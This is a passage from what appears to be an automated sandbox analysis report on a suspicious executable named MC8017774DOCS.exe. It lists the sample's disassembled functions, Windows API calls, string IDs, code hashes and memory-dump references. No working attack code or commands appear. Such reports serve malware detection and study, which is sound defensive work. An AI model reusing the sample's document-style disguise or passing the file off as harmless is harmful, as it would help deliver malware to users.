                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                    • String ID: Call$DC@$N
                                                                                                                                                    • API String ID: 3103080414-3199507676
                                                                                                                                                    • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                    • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                                                                                    • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                    • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                    • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                    • String ID: F
                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                    • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                    • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                                                                    • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                    • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                                                                    Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                                      • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                                                                                    • wsprintfA.USER32 ref: 00405F62
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                                                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                                                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                    • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                                    • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                                                                                    • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                                    • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                                                                                    Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MC8017774DOCS.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                    • API String ID: 589700163-2595587113
                                                                                                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                    • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                    • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                                                                                    Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                                                                                    • GetSysColor.USER32(?), ref: 004042FB
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404325
                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                    • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                    • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                                                                                    Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                      • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                    • String ID: 9
                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                    • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                                    • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                                                                                    • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                                    • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                                                                                    Function 004052FF Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                                    • lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                                    • lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,762323A0), ref: 0040535A
                                                                                                                                                    • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                    • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                                                                                    • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                                                                                    • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                                                                                    • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                                                                                                    Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                                                                                    • GetMessagePos.USER32 ref: 00404BEC
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                    • String ID: f
                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                    • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                    • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                                                                                    Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
